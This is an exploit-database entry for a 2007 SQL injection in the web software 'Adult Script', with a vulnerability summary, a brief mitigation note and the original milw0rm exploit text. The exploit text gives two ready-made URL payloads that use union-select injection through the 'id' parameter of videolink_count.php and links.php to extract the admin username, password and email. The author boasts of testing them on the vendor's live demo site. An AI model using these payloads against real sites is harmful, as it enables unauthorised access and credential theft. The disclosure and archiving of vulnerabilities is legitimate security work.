Adult Script - Remote Sql Injection

vendor:

Adult Script

by:

MhZ91

7.5

CVSS

HIGH

Remote Sql Injection

CWE

Product Name: Adult Script

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Adult Script – Remote Sql Injection

The exploit allows an attacker to perform remote SQL injection on the Adult Script website. By manipulating the 'id' parameter in the 'videolink_count.php' and 'links.php' pages, the attacker can retrieve sensitive information such as the admin username, password, and email. The exploit has been tested on the official demo site of Adult Script and has been found to work effectively.

Mitigation:

To mitigate this vulnerability, the website owner should ensure that all user input is properly validated and sanitized before being used in SQL queries. Additionally, using prepared statements or parameterized queries can help prevent SQL injection attacks.

Source

Exploit-DB raw data:

---------------------------------------------------------------
 ____            __________         __             ____  __   
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
 |___|___|  /\__|  /______  /\___  >__|            |___||__|  
          \/\______|      \/     \/                           
---------------------------------------------------------------

Http://www.inj3ct-it.org	    Staff[at]inj3ct-it[dot]org	

---------------------------------------------------------------

	Multiple Remote Sql Injection

---------------------------------------------------------------

# Author: MhZ91 
# Title: Adult Script - Remote Sql Injection
# Download: http://adultscript.net/ 
# Bug: Remote Sql Injection 
# Visit: http://www.inj3ct-it.org

---------------------------------------------------------------

http://[site]/videolink_count.php?id=-1+union+select+concat(admin_user,char(58),admin_pass,char(58),admin_email)+from+admin

http://[site]/links.php?id=-1+union+select+concat(admin_user,char(58),admin_pass,char(58),admin_email)+from+admin

Whit this u get user:password:email in the page of the error or in the url of the browser :D 

Tested on the official demo site http://adultscript.net/demo/ and it work very good! 

---------------------------------------------------------------

# milw0rm.com [2007-12-23]